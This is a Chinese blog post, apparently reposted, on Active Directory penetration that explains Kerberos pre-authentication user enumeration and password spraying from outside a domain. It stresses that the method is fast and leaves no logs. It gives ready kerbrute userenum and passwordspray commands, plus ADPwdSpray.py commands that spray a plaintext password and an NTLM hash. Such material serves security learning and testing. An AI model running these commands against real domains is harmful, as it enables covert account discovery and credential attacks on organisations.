1. 全栈程序员必看首页

域渗透之 pre-auth用户枚举

全栈程序员-站长 未分类 阅读 59

域渗透之pre-auth用户枚举适用场景与优点适用于在域外对域用户进行用户枚举和爆破使用Kerberospre-authbruteforcing的速度快,并且不会产生日志。适用场景:在

大家好,又见面了,我是全栈君,祝每个程序员都可以多学几门语言。

域渗透之 pre-auth用户枚举

适用场景与优点

适用于在域外对域用户进行用户枚举和爆破

使用Kerberos pre-auth bruteforcing的速度快,并且不会产生日志。
适用场景:

在没有域用户的口令,所以无法通过LDAP协议枚举出所有域用户,可以使用这种方式来验证用户是否存在

用户存在,抓包内容,这里借用三好师傅的图
域渗透之 pre-auth用户枚举

用户不存在,抓包内容如下

域渗透之 pre-auth用户枚举

用户枚举

https://github.com/ropnop/kerbrute

https://github.com/3gstudent/pyKerbrute

kerbrute_windows_amd64.exe userenum --dc 192.168.22.135 -d nncm 1.txt

域渗透之 pre-auth用户枚举

密码喷射

口令正确抓包如下

域渗透之 pre-auth用户枚举

口令错误抓包如下

域渗透之 pre-auth用户枚举

kerbrute_windows_amd64.exe passwordspray --dc 192.168.37.131 -d nncm user.txt xx110110.

//针对明文进行喷洒
python2 ADPwdSpray.py 10.1.1.1 hack.com user.txt clearpassword 123.com tcp

//针对哈希进行喷洒
python2 ADPwdSpray.py 10.1.1.1 hack.com user.txt ntlmhash afffeba176210fad4628f0524bfe1942 udp

域渗透之 pre-auth用户枚举

Reference

渗透技巧-通过Kerberos-pre-auth进行用户枚举和口令爆破

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/119848.html原文链接:https://javaforall.net

(0)
全栈程序员-站长的头像全栈程序员-站长
0 0


相关推荐

  • java栈堆方法区分别存放的东西_java创建栈和堆对象

    java栈堆方法区分别存放的东西_java创建栈和堆对象

    java栈堆方法区分别存放的东西_java创建栈和堆对象之前给大家讲了一下java栈和堆的区别,下面又要给大家详细的讲一下java栈和堆分别存放的是什么,一起来详细的了解一下吧!一、java栈、堆存放的是什么?在java当中,栈中,存放的是基本数据类型和堆中对象的引用,而,堆中,存放的则是对象。其他:一个对象的大小,是不能够估计的,我们又可以这样说,是能够动态变化的,可是在栈中,一个对象就只对应了一个4btye的引用,这也是堆和栈分离的好处。那么相信很…

    全栈程序员-站长的头像 全栈程序员-站长
    2022年9月5日
    2
  • utf8在mysql占几个字符_utf-8的中文,一个字符占几个字节「建议收藏」

    utf8在mysql占几个字符_utf-8的中文,一个字符占几个字节「建议收藏」

    utf8在mysql占几个字符_utf-8的中文,一个字符占几个字节「建议收藏」https://blog.csdn.net/kindsuper_liu/article/details/80202150英文字母和中文汉字在不同字符集编码下的字节数英文字母:·字节数:1;编码:GB2312字节数:1;编码:GBK字节数:1;编码:GB18030字节数:1;编码:ISO-8859-1字节数:1;编码:UTF-8字节数:4;编码:UTF-16字节数:2;编…

    全栈程序员-站长的头像 全栈程序员-站长
    2022年6月26日
    24
  • Android 代码混淆 混淆方案

    Android 代码混淆 混淆方案

    Android 代码混淆 混淆方案本篇文章:自己在混淆的时候整理出比较全面的混淆方法,比较实用,自己走过的坑,淌出来的路。请大家不要再走回头路,可能只要我们代码加混淆,一点不对就会导致项目运行崩溃等后果,有许多人发现没有打包运行好好地,打包完成以后而又不不可以了,导致了许多困惑,本片文章来问大家解决困惑,希望对大家有帮助。

    全栈程序员-站长的头像 全栈程序员-站长
    2022年5月29日
    31
  • 利用 Composer 一步一步构建自己的 PHP 框架(四)——使用 ORM

    利用 Composer 一步一步构建自己的 PHP 框架(四)——使用 ORM

    利用 Composer 一步一步构建自己的 PHP 框架(四)——使用 ORM

    全栈程序员-站长的头像 全栈程序员-站长
    2021年11月7日
    34
  • Windows下面的Netstat命令详解

    Windows下面的Netstat命令详解

    Windows下面的Netstat命令详解  netstat[-a][-e][-n][-o][-pProtocol][-r][-s][Interval] 参数解释:-a 显示所有活动的TCP连接以及计算机侦听的TCP和UDP端口。 -e 显示以太网统计信息,如发送和接收的字节数、数据包数。该参数可以与-s结合使用。 -n 显示活动的TCP连接,不过,只以数字…

    全栈程序员-站长的头像 全栈程序员-站长
    2022年5月30日
    39
  • sftp指定端口登录_查看远程端口

    sftp指定端口登录_查看远程端口

    sftp指定端口登录_查看远程端口使用sftp在一台服务器连另一台服务器,可以通过sftp–help查看指定端口参数。但不同服务器可能sftp版本不一样,-P指定的不是port而是sftp_server_path.却没找到指定端口参数。T^T可以尝试如下方式指定端口:sftp-oPort=123user@host…

    全栈程序员-站长的头像 全栈程序员-站长
    2022年9月14日
    0

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号